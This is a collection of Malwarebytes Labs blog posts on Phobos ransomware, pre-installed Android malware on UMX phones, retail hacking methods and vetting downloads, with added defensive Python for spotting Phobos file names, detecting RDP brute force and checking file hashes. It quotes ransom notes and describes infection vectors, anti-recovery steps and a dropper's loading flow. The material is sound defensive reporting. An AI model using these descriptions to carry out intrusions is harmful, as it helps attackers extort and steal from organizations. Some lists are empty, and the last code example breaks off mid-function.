Phobos is another one of those ransomware families that primarily targets organizations by employing tried-and-tested tactics to infiltrate systems. Sometimes called Phobos NextGen and Phobos NotDharma, many consider this ransomware an off-shoot or variant—if not a rip-off—of the Dharma ransomware family, which is also called CrySis. This is attributed to Phobos’ operational and technical likeness to recent Dharma strains.

Phobos ransomware, like Sodinokibi, is sold in the underground in ransomware-as-a-service (RaaS) packages. This means that criminals with little to no technical know-how can create their own ransomware strain with the help of a kit, and organize a campaign against their desired targets.

However, Coveware researchers have noted that, compared to their peers, Phobos operators are “less organized and professional,” which has eventually led to extended ransom negotiations and more complications retrieving files and systems for Phobos ransomware victims during the decryption process.

Phobos ransomware infection vectors

Phobos can arrive on systems in several ways: via open or insecure remote desktop protocol (RDP) connections on port 3389, brute-forced RDP credentials, the use of stolen and bought RDP credentials, and old-fashioned phishing. Phobos operators can also leverage malicious attachments, downloads, patch exploits, and software vulnerabilities to gain access to an organization’s endpoints and network.

Phobos ransomware primarily targets businesses; however, there have been several reports of consumers finding themselves face-to-face with this adversary, too.

Symptoms of Phobos ransomware infection

Systems affected by variants of the Phobos ransomware display the following symptoms:

Presence of ransom notes. Upon infection, Phobos drops two ransom notes in text (.TXT) and in executable web file (.HTA) format. The latter automatically opens after Phobos finishes encrypting files.

The HTA ransom note, which was noted to be a re-branded version of Dharma’s ransom note

Here’s a snippet of the note:

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email address 1]

Write this ID in the title of your message [generated ID]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.

As you can see, Phobos operators are requiring victims to contact them in the event of their ransomware infection.

In some notes from other variants, instructions to reach threat actors via Jabber are not included.

Aside from the channels through which victims can reach the threat actors, this ransom note also contains information on how to acquire Bitcoins and how to install the messenger client.

The TXT ransom note, which is notably shorter than its HTA counterpart. This means that non-tech savvy victims would have to resort to doing their own research to understand unfamiliar terms. Note that while this contains the email addresses also found in the HTA file, it doesn’t contain the generated ID.

!!! All of your files are encrypted !!!

To decrypt them send e-mail, to this address: [email address 1]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

After triggering the opening of the HTA ransom note, which supposedly signifies the end of Phobos’ encryption, we have observed that it is an aggressive ransomware that continues to run in the background and encode new files it is programmed to encrypt. It can do this with or without an Internet connection.

Encrypted files with a long, appended string after the extension name. Phobos encrypts target files using AES-256 with RSA-1024 asymmetric encryption. Both Phobos and Dharma implement the same RSA algorithm; however, Phobos uses it from Windows Crypto API while Dharma uses it from a third-party static library. Upon encryption, it appends a compound extension name at the end of encrypted files. The appended string follows this format:

.ID[ID].[email address 1].[added extension]

In the formula, [ID] is the generated ID number specified in the ransom note. It is a two-part alpha-numeric string: the victim ID and the version ID, separated by a dash. [email address 1] is the email address victims are prescribed to use in reaching out to the threat actors. This is also specified in the ransom note. Lastly, [added extension] is an extension that Phobos threat actors decide to associate their ransomware with. Below are known extensions Phobos uses:

  • 1500dollars
  • actin
  • Acton
  • actor
  • Acuff
  • Acuna
  • acute
  • adage
  • Adair
  • Adame
  • banhu
  • banjo
  • Banks
  • Banta
  • Barak
  • bbc
  • blend
  • bqux
  • Caleb
  • Cales
  • Caley
  • calix
  • Calle
  • Calum
  • Calvo
  • com
  • DDoS
  • deal
  • deuce
  • Dever
  • devil
  • Devoe
  • Devon
  • Devos
  • dewar
  • eight
  • eject
  • eking
  • Elbie
  • elbow
  • elder
  • Frendi
  • help
  • karma
  • mamba
  • phobos
  • phoenix
  • PLUT
  • zax

For example, the new file name of sample.bmp after encryption is sample.bmp.ID[23043C5D-2394].[].Caleb.
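The naming scheme above is enough to pick Phobos-encrypted files out of a directory listing during triage. The Python below is an added example, not code from Malwarebytes or from the write-up: it parses the `.ID[victim-version].[email].[extension]` pattern, reports whether the appended extension is one of the known ones listed above, and groups hits by victim ID, version ID and contact address so that one affected share can be attributed to one campaign. The file names and the `example.invalid` contact addresses are constructed sample data; the function names are my own.

```python
import re
from collections import Counter

# Extensions the write-up lists as known Phobos "added extensions" (mixed case as published).
KNOWN_PHOBOS_EXTENSIONS = {
    "1500dollars", "actin", "Acton", "actor", "Acuff", "Acuna", "acute", "adage",
    "Adair", "Adame", "banhu", "banjo", "Banks", "Banta", "Barak", "bbc", "blend",
    "bqux", "Caleb", "Cales", "Caley", "calix", "Calle", "Calum", "Calvo", "com",
    "DDoS", "deal", "deuce", "Dever", "devil", "Devoe", "Devon", "Devos", "dewar",
    "eight", "eject", "eking", "Elbie", "elbow", "elder", "Frendi", "help", "karma",
    "mamba", "phobos", "phoenix", "PLUT", "zax",
}
_KNOWN_LOWER = {e.lower() for e in KNOWN_PHOBOS_EXTENSIONS}

# <original name>.ID[<victim ID>-<version ID>].[<contact email>].<added extension>
# The write-up prints the marker as ".ID["; the match is case-insensitive so that
# lower-case samples are caught too. Both ID parts are treated as alphanumeric runs.
PHOBOS_NAME_RE = re.compile(
    r"^(?P<original>.+?)"                                     # pre-encryption file name
    r"\.id\[(?P<victim>[0-9A-Z]+)-(?P<version>[0-9A-Z]+)\]"   # .ID[victim-version]
    r"\.\[(?P<email>[^\]]*)\]"                                # .[contact email]
    r"\.(?P<ext>[^.]+)$",                                     # .added extension
    re.IGNORECASE,
)


def parse_phobos_name(filename):
    """Return the parts of a Phobos-style file name, or None if the name does not match."""
    m = PHOBOS_NAME_RE.match(filename)
    if not m:
        return None
    ext = m.group("ext")
    return {
        "original_name": m.group("original"),
        "victim_id": m.group("victim"),
        "version_id": m.group("version"),
        "email": m.group("email"),
        "extension": ext,
        # Unknown extensions still match the scheme: a new affiliate, not a clean file.
        "known_extension": ext.lower() in _KNOWN_LOWER,
    }


def scan_listing(filenames):
    """Return one record per file whose name follows the Phobos scheme."""
    hits = []
    for name in filenames:
        parsed = parse_phobos_name(name)
        if parsed:
            parsed["filename"] = name
            hits.append(parsed)
    return hits


def summarize(hits):
    """Count hits per (victim ID, version ID, contact email): one key per campaign."""
    return Counter((h["victim_id"], h["version_id"], h["email"]) for h in hits)


# Constructed directory listing for the demo (the contact addresses are placeholders).
SAMPLE_LISTING = [
    "sample.bmp.id[23043C5D-2394].[contact@example.invalid].Caleb",
    "Q4-forecast.xlsx.id[23043C5D-2394].[contact@example.invalid].Caleb",
    "backup.vhd.id[23043C5D-2394].[contact@example.invalid].Caleb",
    "photo.jpg.id[7F1A22B0-2412].[other@example.invalid].zzzz",  # same scheme, extension not in the list
    "report.docx",
    "notes.txt",
    "archive.id[not-a-phobos-name].zip",
]

if __name__ == "__main__":
    found = scan_listing(SAMPLE_LISTING)
    for h in found:
        flag = "" if h["known_extension"] else "  (extension not in known list)"
        print(f'{h["filename"]} -> {h["original_name"]} victim={h["victim_id"]} '
              f'version={h["version_id"]} contact={h["email"]}{flag}')
    for key, n in summarize(found).items():
        print("campaign", key, "files:", n)
```

Run over `dir /s /b` or `find` output from an affected host, the `summarize()` counts tell you quickly whether one operator hit everything or whether several affiliates (different IDs or contact addresses) are present, which matters when deciding what a single decryptor would cover.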

Phobos encrypts files with the following extensions:

However, it skips encoding the following OS files and files in the C:\Windows folder:

  • boot.ini
  • bootfont.bin
  • ntldr
  • io.sys

Phobos fully encrypts files of typical size. For large files, however, it uses a different routine that encrypts only selected portions of the file. This severely cuts down the time it takes to process large files and, at the same time, maximizes the damage to such a file if something goes wrong with its decryption.

This ransomware attacks files in all local drives as well as network shares.

Terminated processes. Phobos ransomware is known to terminate the following active processes on affected systems so that no programs can stop it from accessing files to eventually encrypt:

Deleted shadow copies and local backups. Like Sodinokibi and other ransomware families, Phobos deletes shadow copies and backup copies of files to prevent users from restoring encrypted files, thus, forcing them to do the threat actors’ bidding.

Systems not booting in recovery mode. Recovery mode is innate in Windows systems. If users encounter a technical flaw leading to the system crashing or getting corrupted, they have the option to restore the OS to its normal state by reloading its last known state before the flaw. Phobos removes this option by preventing users from entering this mode.

Disabled firewall. With the firewall turned off, malware that the firewall would otherwise have blocked can reach the affected system.

Protect your system from Phobos ransomware

Malwarebytes’ signature-less detection, coupled with real-time anti-malware and anti-ransomware technology, identifies and protects consumer and business users from Phobos ransomware in various stages of attack.

We recommend both consumers and IT administrators take the following actions to secure and mitigate against Phobos ransomware attacks:

  • Set your RDP server, which is built into the Windows OS, to deny public IPs access to TCP port 3389, the default port Windows Remote Desktop listens on. If you or your organization have no need for RDP, it is better to disable the service altogether. Critical systems or systems with sensitive information should not have RDP enabled.
  • Along with RDP port blocking, we also suggest blocking TCP port 445 at the network perimeter; this is the default port Server Message Block (SMB) uses to communicate in a Windows-based LAN. Note that you or your organization may have to do in-depth testing to see how your systems and/or programs are affected by this block. As a rule of thumb, block all unused ports.
  • Allow RDP access only to IPs that are under your or your organization’s control.
  • Enable logging of RDP access attempts and review the logs regularly to detect potential intrusions.
  • Enforce the use of strong passwords and account lockout policies for Active Directory domains and local Windows accounts.
  • Enforce multi-factor authentication (MFA) for RDP and local account logons whenever possible.
  • Enforce the use of virtual private networks (VPNs) if your organization allows employees to work remotely.
  • Come up with and implement a sound backup strategy.
  • Maintain an inventory of running services and applications on your systems, and review it regularly. For critical systems, it’s best to have an active monitoring and alerting scheme in place.
  • Have a disaster recovery scheme in place in case a successful breach via RDP happens.
  • Keep all your software, including OS and anti-malware, up-to-date.
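Two of the items above, logging RDP access attempts and allowing RDP only from addresses you control, are only useful if someone actually reviews the log. The Python below is an added example of that review, not code from Malwarebytes or the write-up: it walks Windows Security logon events in time order and raises alerts for the patterns that precede a Phobos-style RDP intrusion: a burst of failed logons from one source (brute force), one source trying many different accounts (password spray), a successful RDP logon from a source that was failing shortly before, and any successful RDP logon from outside the approved networks. The events are constructed sample records with only the fields the logic needs (real events carry many more); the event IDs 4625/4624 and LogonType 10 are standard Windows values, and the function and field names, thresholds and address ranges are my own choices.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625    # Windows Security event: an account failed to log on
SUCCESS_LOGON = 4624   # Windows Security event: an account was successfully logged on
RDP_LOGON_TYPE = 10    # LogonType 10 = RemoteInteractive, i.e. a Remote Desktop session
# Failed attempts against a host with Network Level Authentication enabled are commonly
# recorded with LogonType 3 (Network) rather than 10, so both are counted as RDP failures.
RDP_FAILURE_TYPES = {3, 10}


def detect_rdp_abuse(events, allowed_networks, fail_threshold=5, spray_users=3,
                     window=timedelta(minutes=10)):
    """Return a list of alert dicts for the RDP abuse patterns found in `events`."""
    allowed = [ipaddress.ip_network(n) for n in allowed_networks]
    ordered = sorted(
        ({**e, "time": datetime.fromisoformat(e["time"])} for e in events),
        key=lambda e: e["time"],
    )
    failures = defaultdict(list)      # src_ip -> [(time, user), ...]
    brute_alerted, spray_alerted, alerts = set(), set(), []

    for e in ordered:
        ip, user, t = e["src_ip"], e["user"], e["time"]
        if e["event_id"] == FAILED_LOGON and e["logon_type"] in RDP_FAILURE_TYPES:
            failures[ip].append((t, user))
            recent = [(ft, fu) for ft, fu in failures[ip] if t - ft <= window]
            # Brute force: many failures from one source inside the window (alert once per IP).
            if len(recent) >= fail_threshold and ip not in brute_alerted:
                brute_alerted.add(ip)
                alerts.append({"rule": "brute_force", "src_ip": ip,
                               "count": len(recent), "time": t})
            # Password spray: one source cycling through distinct account names.
            users = sorted({fu for _, fu in recent})
            if len(users) >= spray_users and ip not in spray_alerted:
                spray_alerted.add(ip)
                alerts.append({"rule": "password_spray", "src_ip": ip,
                               "users": users, "time": t})
        elif e["event_id"] == SUCCESS_LOGON and e["logon_type"] == RDP_LOGON_TYPE:
            # A success right after failures from the same source suggests a guessed password.
            prior = [ft for ft, _ in failures.get(ip, []) if t - ft <= window]
            if prior:
                alerts.append({"rule": "success_after_failures", "src_ip": ip,
                               "user": user, "prior_failures": len(prior), "time": t})
            # Any RDP session from outside the approved ranges violates the allowlist.
            if not any(ipaddress.ip_address(ip) in net for net in allowed):
                alerts.append({"rule": "rdp_from_unapproved_network", "src_ip": ip,
                               "user": user, "time": t})
    return alerts


# Constructed sample events (documentation IP ranges, fictional accounts).
SAMPLE_EVENTS = [
    {"time": "2020-01-10T02:00:05", "event_id": 4625, "logon_type": 3, "user": "administrator", "src_ip": "203.0.113.45"},
    {"time": "2020-01-10T02:00:17", "event_id": 4625, "logon_type": 3, "user": "administrator", "src_ip": "203.0.113.45"},
    {"time": "2020-01-10T02:00:29", "event_id": 4625, "logon_type": 3, "user": "administrator", "src_ip": "203.0.113.45"},
    {"time": "2020-01-10T02:00:41", "event_id": 4625, "logon_type": 3, "user": "administrator", "src_ip": "203.0.113.45"},
    {"time": "2020-01-10T02:00:53", "event_id": 4625, "logon_type": 3, "user": "administrator", "src_ip": "203.0.113.45"},
    {"time": "2020-01-10T02:01:05", "event_id": 4625, "logon_type": 3, "user": "administrator", "src_ip": "203.0.113.45"},
    {"time": "2020-01-10T02:03:10", "event_id": 4624, "logon_type": 10, "user": "administrator", "src_ip": "203.0.113.45"},
    {"time": "2020-01-10T02:10:00", "event_id": 4625, "logon_type": 3, "user": "alice", "src_ip": "198.51.100.7"},
    {"time": "2020-01-10T02:10:30", "event_id": 4625, "logon_type": 3, "user": "bob", "src_ip": "198.51.100.7"},
    {"time": "2020-01-10T02:11:00", "event_id": 4625, "logon_type": 3, "user": "carol", "src_ip": "198.51.100.7"},
    {"time": "2020-01-10T02:11:30", "event_id": 4625, "logon_type": 3, "user": "dave", "src_ip": "198.51.100.7"},
    {"time": "2020-01-10T08:30:00", "event_id": 4624, "logon_type": 10, "user": "alice", "src_ip": "10.0.5.20"},
    {"time": "2020-01-10T09:15:00", "event_id": 4624, "logon_type": 10, "user": "bob", "src_ip": "192.0.2.9"},
]
# Networks from which RDP sessions are expected (assumed internal ranges for the demo).
ALLOWED_RDP_NETWORKS = ["10.0.0.0/8", "192.168.0.0/16"]

if __name__ == "__main__":
    for alert in detect_rdp_abuse(SAMPLE_EVENTS, ALLOWED_RDP_NETWORKS):
        print(alert["time"].isoformat(), alert["rule"], alert["src_ip"],
              {k: v for k, v in alert.items() if k not in ("time", "rule", "src_ip")})
```

The thresholds and window are tuning knobs; the right values depend on how much legitimate mistyping your users generate. The allowlist check is the cheapest and highest-signal rule of the four: if RDP is supposed to be reachable only over the VPN, any RemoteInteractive logon from another range is worth a call regardless of whether it followed failures.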

On a final note, if you have all your personal or organization resources properly locked down and secured, and you or your organization adhere to good cyber hygiene practices, there is little to be feared about Phobos or any ransomware in general.

Indicators of Compromise (IOCs)
  • e59ffeaf7acb0c326e452fa30bb71a36
  • eb5d46bf72a013bfc7c018169eb1739b
  • fa4c9359487bbda57e0df32a40f14bcd

Have a threat-free 2020, everyone!

The post Threat spotlight: Phobos ransomware lives up to its name appeared first on Malwarebytes Labs.


United States government-funded phones come pre-installed with unremovable malware

Malwarebytes - Thu, 01/09/2020 - 16:00

UPDATE: January 10, 2020

At time of original publication, we were not yet able to replicate the malware Android/Trojan.HiddenAds being dropped on our test device, though multiple users had reported that a variant of HiddenAds suddenly installed on their UMX mobile phone.

As of today, we are now able to report that our UMX U683CL test phone has become infected with a variant of HiddenAds we detect as Android/Trojan.HiddenAds.WRACT. This variant has been observed in the wild since spring 2019. It runs silently in the background and does not create an app icon. Evidence of its running in the background can be seen in the mobile device’s notifications. A notification box that changes its title name is highlighted below in red.

The app runs in the background without an icon, though a space remains where it would be.

The notification bar cannot be swiped out in notifications. It stubbornly remains running in the background.

Fortunately, there is a way to find and uninstall this app. If you press and hold the notification, it will give the option to go to MORE SETTINGS.

After clicking MORE SETTINGS, it will take you to the app’s notification settings. From there, press the app’s icon at the top.

Lastly, it will take you to the app’s App info, where you can uninstall.

Of course, Malwarebytes for Android takes care of this as well.


A United States–funded mobile carrier that offers phones via the Lifeline Assistance program is selling a mobile device pre-installed with not one, but two nefarious applications. Assurance Wireless by Virgin Mobile offers the UMX U683CL phone as their most budget conscious option. At only $35 under the government-funded program, it’s an attractive offering. However, what it comes installed with is appalling.

Not just malicious, but pre-installed

In October 2019, we saw several complaints in our support system from users with a government-issued phone reporting that some of its pre-installed apps were malicious. We purchased a UMX U683CL to better assist our customers and verify their claims.

We informed Assurance Wireless of our findings and asked them point blank why a US-funded mobile carrier is selling a mobile device infected with pre-installed malware. After giving them adequate time to respond, we unfortunately never heard back. Here’s what we discovered.

The first questionable app found on the UMX U683CL poses as an updater named Wireless Update. Yes, it is capable of updating the mobile device. In fact, it’s the only way to update the mobile device’s operating system (OS). Conversely, it is also capable of auto-installing apps without user consent.

Thus, we detect this app as Android/PUP.Riskware.Autoins.Fota.fbcvd, a detection name that should sound familiar to Malwarebytes for Android customers. That’s because the app is actually a variant of Adups, a China-based company caught collecting user data, creating backdoors for mobile devices and, yes, developing auto-installers.

From the moment you log into the mobile device, Wireless Update starts auto-installing apps. To repeat: There is no user consent collected to do so, no buttons to click to accept the installs, it just installs apps on its own. While the apps it installs are initially clean and free of malware, it’s important to note that these apps are added to the device with zero notification or permission required from the user. This opens the potential for malware to unknowingly be installed in a future update to any of the apps added by Wireless Update at any time. 

Not just pre-installed, but unremovable

It’s with great frustration that I must write about another unremovable pre-installed app found on the UMX U683CL phone: the mobile device’s own Settings app functions as a heavily-obfuscated malware we detect as Android/Trojan.Dropper.Agent.UMX. Because the app serves as the dashboard from which settings are changed, removing it would leave the device unusable.

Android/Trojan.Dropper.Agent.UMX shares characteristics with two other variants of known mobile Trojan droppers. The first characteristic is that it uses the same receiver and service names. The receiver name ends with ALReceiver and the service name ends with ALAJobService. These names alone are too generic to make a solid correlation. But coupled with the fact that the code is almost identical, we can confidently confirm a match.

The only difference between the two code bases is their variable names. The more discernible variant of this malware uses Chinese characters for variable names. Therefore, we can assume the origin of this malware is China.

Variant of malware with Chinese variable names

The second characteristic it shares is containing an encoded string within the code. Decoding this string reveals a hidden library file named

Decoded string with

Let’s take some time to look at how the code flows while decoding. It first grabs the encoded string and decodes it using Base64 decoding.

Encoded string
Base64 decoding

It then loads the decoded library into memory using DexClassLoader.

DexClassLoader loading decoded string

After the library is loaded into memory, it then drops another piece of malware known as Android/Trojan.HiddenAds.

Although we have yet to reproduce the dropping of additional malware ourselves, our users have reported that indeed a variant of HiddenAds suddenly installs on their UMX mobile device.

The malware origin

In addition to the malware being of Chinese origin, it’s noteworthy to mention that this UMX mobile device is made by a Chinese company as well. This could simply be a coincidence rather than explicit malcontent—we cannot confirm if the makers of the device are aware there is Chinese malware pre-installed.

No current resolution

Although we do have a way to uninstall pre-installed apps for current Malwarebytes users, doing so on the UMX has consequences. Uninstall Wireless Update, and you could be missing out on critical updates for the OS. We think that’s worth the tradeoff, and suggest doing so. 

But uninstall the Settings app, and you just made yourself a pricey paper weight. We do offer an attempt to remediate such pre-installed malware in our blog: The new landscape of pre-installed mobile malware: malicious code within. See section: Attempting to remediate.

Pre-installed malware getting worse, as foreshadowed

As I have highlighted in this blog and blogs past, pre-installed malware continues to be a scourge for users of mobile devices. But now that there’s a mobile device available for purchase through a US government-funded program, this henceforth raises (or lowers, however you view it) the bar on bad behavior by app development companies.

Budget should not dictate whether a user can remain safe on his or her mobile device. Shell out thousands for an iPhone, and escape pre-installed maliciousness. But use government-assisted funding to purchase a device and pay the price in malware? That’s not the type of malware-free existence we envision at Malwarebytes.

Final words on UMX U683CL

Having an actual UMX U683CL in my hands, I can tell you it is not a bad phone. It feels solid in hand and runs smoothly. Sure, it’s not the fastest mobile device, but it’s a fully capable smart phone. In general, without the malware, this device is a good option for anyone on a budget. 

It’s important to realize that UMX isn’t alone. There are many reports of budget manufacturers shipping devices pre-installed with malware, and these reports are increasing in number. Although I don’t have the answer to this widespread issue, I can say that US citizens using the Lifeline Assistance Program and many others on a tight budget deserve more. Stay safe out there.

Correction: An earlier version of this blog listed the UMX model as U686CL. The correct model is UMX U683CL. We apologize for the confusion.

The post United States government-funded phones come pre-installed with unremovable malware appeared first on Malwarebytes Labs.


6 ways hackers are targeting retail businesses

Malwarebytes - Wed, 01/08/2020 - 18:04

Retail hacking is no new phenomenon, although it has increased in frequency over the last few years. In fact, retailers experienced more breaches than any other industry in 2019, and they’ve lost over $30 billion to cybersecurity attacks.

Both brick-and-mortar and online businesses experience retail hacking. Cybercriminals must often work harder to access online stores because these companies’ reputations ride on secure transactions. However, they’re not exempt from the flood of break-ins that happen during high-volume shopping seasons, including back-to-school, Black Friday, and the winter holidays.

Last-minute shoppers become the victims of retail hackers looking for simple ways in. Many consumers rush to buy gifts before the holidays sneak up on them, meaning they’re less diligent about scams and fraudulent sites. Shoppers might be willing to visit stores and webpages they’ve never been to before in search of hard-to-find items. Threat actors know this and take advantage of it with scarily authentic scams.

Even though the holidays have passed, shoppers should remain vigilant about scams and retail attacks—especially as web skimmers up the ante with social engineering tactics and evasion methods. Businesses, too, will benefit from strengthening their security protocols and staying up-to-date on the latest hacking methods.

1. Credential stuffing

Retail hackers frequently use credential stuffing, or the use of stolen usernames and passwords, to break into systems because it’s one of the easiest ways to siphon off data. Many people use the same passwords across multiple sites, which leaves them open to invasion. Hackers collect these credentials via purchase from the dark web or databases of personally identifiable information left online after massive breaches, and use them to hack into retailers and buy products.

Chipotle experienced a breach like this earlier in 2019, where customers’ credit cards racked up hundreds of dollars in food purchases. However, many customers argued that their passwords were unique to Chipotle, which raises the question of how else cybercriminals could have accessed their accounts.

2. Near field communication (NFC)

Price scanners, cell phones, and card readers are notorious targets for NFC breaches. NFC technology allows customers to use their phones to purchase goods by tapping them against a reader.

Similarly, someone can scan a QR code and gain access to an exclusive app or land on a site where they can purchase items. Though NFC is convenient, retail hackers have little problem intercepting the data from its transactions and stealing information.

Even malware can pass from infected phones to retail systems. NFC technology is prevalent in face-to-face transactions, but more sites are hosting QR codes for users to scan. Hackers generally use several different ways to manipulate data transmitted over a distance:

  • Corruption: They use a third device to intercept a connection between two other electronic devices, which destroys the information being sent.
  • Eavesdropping: Cybercriminals pick up on private information by recording communications between two devices. Using this technique can give someone access to credit cards and other payment information.
  • Modification: The hacker manipulates the data before it reaches its intended source—meaning they can alter important details or inject malware or other harmful components.

3. RAM scraping

RAM scraping is a procedure hackers use to enter point-of-sale software. Every card transaction leaves data in the retailer’s terminal system. This information lasts temporarily as a part of the machine’s RAM, but threat actors can implant POS malware that reads this input before it disappears. By scraping this information, they obtain all the items stored on a card’s tracks—such as the account number, CVN, and expiration date.

The massive Target breach of 2013 is one example of RAM scraping in action. Text strings containing credit card information can remain in a retailer’s database for seconds, minutes, or hours. The longer it stays, the more chances hackers have for grabbing it before it goes.

4. Card readers

The magnetic strips on credit and debit cards make them frequent targets for cybersecurity attacks. Hackers don’t always need to force their way into online accounts—they can glean data from a single card swipe. Card data, which includes PINs and card numbers, remains encrypted until the moment of the swipe. Skilled criminals can take this opportunity to snatch the information and use it for themselves or sell it to others.

Many retailers and card companies have switched to chips instead of magnetic strips. Chips create a unique code that is only used for a single purchase. This form of EMV technology—which stands for Europay, Mastercard, and Visa—makes it harder to duplicate information and use it for subsequent transactions.

5. Web skimming

Web skimmers had quite a year in 2019, helped along by the criminal groups known collectively as Magecart, which were responsible for developing a slew of new techniques for stealing from online retailers and consumers alike.

Web skimmers sneak malware into website codes to glean personal information from customers. All e-commerce sites have a payment page for completing purchases, most of which are securely encrypted. However, those without airtight security are prime targets for web skimmers. This malware is hard to detect—especially for small businesses without advanced tech—and it can affect hundreds of customers at a time, making it a favorite among threat actors.

Skimmers enter sites through a third party, such as a plug-in or an e-commerce page. These entryways are easier to get through because they often contain weaker code structure. (First-party entry commonly happens only to those small sites without strong cybersecurity measures in place.) Once the script infects the webpage, it funnels passwords, social security numbers, and credit card numbers back to the cybercriminals’ servers.

6. Social engineering

Social engineering might sound like a term too vague to be real, but this tactic is one of the oldest in the criminal book, useful for preying on emotions. In the pre-Internet days, someone might dress up as an employee of a department store and pretend to work there to access private information. They might ask other employees for information, knowing that some harried workers will readily supply it so they can return to their tasks. Others might loiter in front of a store and scam people out of cash using the old shoeshine technique.

Online, social engineering looks a bit different for retailers and shoppers. Websites might sell counterfeit goods at too-good-to-be-true prices, then snatch the personal information of customers while they’re at it. Watering hole attack strategies target hundreds of users at a time by analyzing their Internet browsing habits then laying siege at sites known to attract particular user groups, such as mommy blogs, gamers, or foodies. Phishing emails might pose as favorite retailers asking for account updates, while delivering malware or ransomware instead.

Beating web threats

With so many ways to steal information, it’s plain to see why retail cybercriminals often see success during the holidays and otherwise. Although retail hacking runs rampant during high shopping seasons, it doesn’t have to deter shoppers from completing their last-minute purchases. The onus is on businesses to secure their data and build trust with their consumers and partners.

Though no system is entirely unhackable, businesses should follow standard cybersecurity procedures and aim for the best defenses possible. Prioritizing user safety will allow them to build trustworthy relationships with their shoppers.

The post 6 ways hackers are targeting retail businesses appeared first on Malwarebytes Labs.


Dubious downloads: How to check if a website and its files are malicious

Malwarebytes - Tue, 01/07/2020 - 17:45

A significant amount of malware infections and potentially unwanted program (PUP) irritants are the result of downloads from unreliable sources. There are a multitude of websites that specialize in distributing malicious payloads by offering them up as something legitimate or by bundling the desired installer with additional programs.

In November 2019, we learned that Intel removed old drivers, BIOS updates, and other legacy software from their site. While this software relates to products released in the last century and early years of the 2000s, many users still rely on old Intel products and have been left scrambling for specific downloads.

Users that follow older links to certain drivers and updates will find this instead:

Following the links to search the site or the download center only leads users around in circles—those downloads are gone. While some might argue that it is Intel’s right to remove drivers and updates after a decade, others understand that whenever legacy software is abandoned, a security nightmare ensues.

When users can no longer download files from official sources, desperate people will roam the Internet for a place where they can find the file they need. And what they usually find instead are malicious websites and downloads.

Malvertising using popular downloads

Habitually, threat actors find out which search terms are gaining in popularity as users seek out terminated software downloads and try to lure searchers to their site. They will use SEO techniques to rank high in the search results or may even spend some dollars to show up in the sponsored results for certain keywords. They can hide their malware in malvertising in the form of downloads or even drive-by-downloads, in which users needn’t install a single file, only visit the site, to be infected.

After all, a victim that is desperately looking for a file he needs to get a system up and running again is really all a malware peddler could wish for. All they have to do is make the user of the site believe they have found the file they are looking for. Once they are convinced, they will download and install the alleged driver all by themselves.

All the threat actor has to do is upload the malware under some convincing filename and attract visitors to the site. This is basically the same modus operandi that you will find in use when people go looking for cracks and keygens.

So, what can users do to avoid falling victim to such a scam? A couple of things, as it happens. We will provide you with some checks you can do before you visit the download site. And there are some checks you can perform before you run the downloaded file, too.

Checks you can perform to assess the website

When you have found a site that offers a file for download, there are a few actions you can take to check whether the site is trustworthy. They are:

  • Check for the green padlock
  • Read third-party reviews of the website
  • Use a trusted antivirus or browser extension, such as Browser Guard

Checking for the presence of the green padlock is a good start to ensure a site has purchased a security certificate, but it’s also not a guarantee that the website is safe. SSL certificates are cheap, and your neighborhood cybercriminal knows where to get them practically for free. If you click on the green padlock, you can find out who issued the certificate and for which site.

Recommended reading: Explained: security certificates

There are many websites that offer reviews of download sites and domains, and while many of these sites are reputable, they tend to fall a little bit behind in adding Internet newcomers. Our cybercriminal can afford to dump a domain like a hot potato once it has racked up too many bad reviews, then purchase a new site from which to run his scheme.

In short, you can trust reviews about sites that have been around for a while, but the lack of reviews for a site could mean they only started or they may be up to no good.

Some cybercriminals are brilliant programmers. Most are not. But all the successful ones have one skill in common: They are well-versed in tricking people. So, don’t accept a website as trustworthy just because it features logos of other trustworthy companies on its pages. Logo images are easily found in online searches, and they could be planted on the site for exactly that reason: to gain the visitors’ trust. Logos could also be stolen, unauthorized, or handed out for different reasons than you might expect.

Some browsers and some free applications warn you about shady sites—especially sites they know to be the home of malware and scammers. Malwarebytes Browser Guard, for example, can be installed on Chrome and Firefox, adding to the browsers’ own capabilities to recognize malicious domains and sites.

How do I filter possible malware from the downloaded files

There are some methods you can use to weed out the bad boys in your download folder:

  • Compare the checksum to the original file
  • Look at the file’s digital signature
  • Run a malware scan

A checksum is a string of letters and digits computed from a file’s contents; any change to the file, however small, produces a different checksum. If you know the checksum of the original file, you can compare it to the one you have downloaded. Windows, macOS, and Linux have built-in options to calculate the checksum of a file.

The digital signature of a Windows executable file (a file with an .exe extension) can be verified after the file has been downloaded and saved. In your Downloads folder, right-click the downloaded .exe file and click Properties. Here you can click on the Digital Signatures tab to check whether the downloaded file is signed by the expected party.

Finally, use your anti-malware scanner to double-check that you are not downloading an infected file. You can also use online scanners like VirusTotal, which will also provide you with a SHA-256 hash for the file and save you the trouble of calculating a checksum.
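As an added example that is not part of the original post, the following Python script shows the checksum comparison in practice: it streams a file through SHA-256, parses a vendor-published sha256sum-style line, and compares the two digests in constant time. The file names and contents are constructed stand-ins, not real downloads.

```python
import hashlib
import hmac
import os
import tempfile

# Added example, not from the Malwarebytes post: verify a downloaded file against
# a published SHA-256 checksum. All file names and contents below are constructed.

def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large installers never need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def parse_checksum_line(line):
    """Parse one line in the common '<hex digest>  <filename>' format written by sha256sum."""
    parts = line.split()
    if len(parts) != 2 or len(parts[0]) != 64:
        raise ValueError("not a sha256sum-style line: %r" % line)
    digest, name = parts
    int(digest, 16)                      # raises ValueError if the digest is not hexadecimal
    return digest.lower(), name.lstrip("*")   # a leading '*' marks binary mode in sha256sum

def verify_download(path, expected_hex):
    """Return True only if the file's SHA-256 matches the vendor-published digest.
    hmac.compare_digest avoids leaking where the comparison first failed."""
    actual = sha256_of_file(path)
    return hmac.compare_digest(actual, expected_hex.lower())

def demo():
    """Constructed stand-ins for a driver installer, the vendor's checksum line,
    and a tampered copy from a third-party mirror. Returns (genuine_ok, tampered_ok)."""
    with tempfile.TemporaryDirectory() as tmp:
        genuine = os.path.join(tmp, "legacy_driver_setup.exe")
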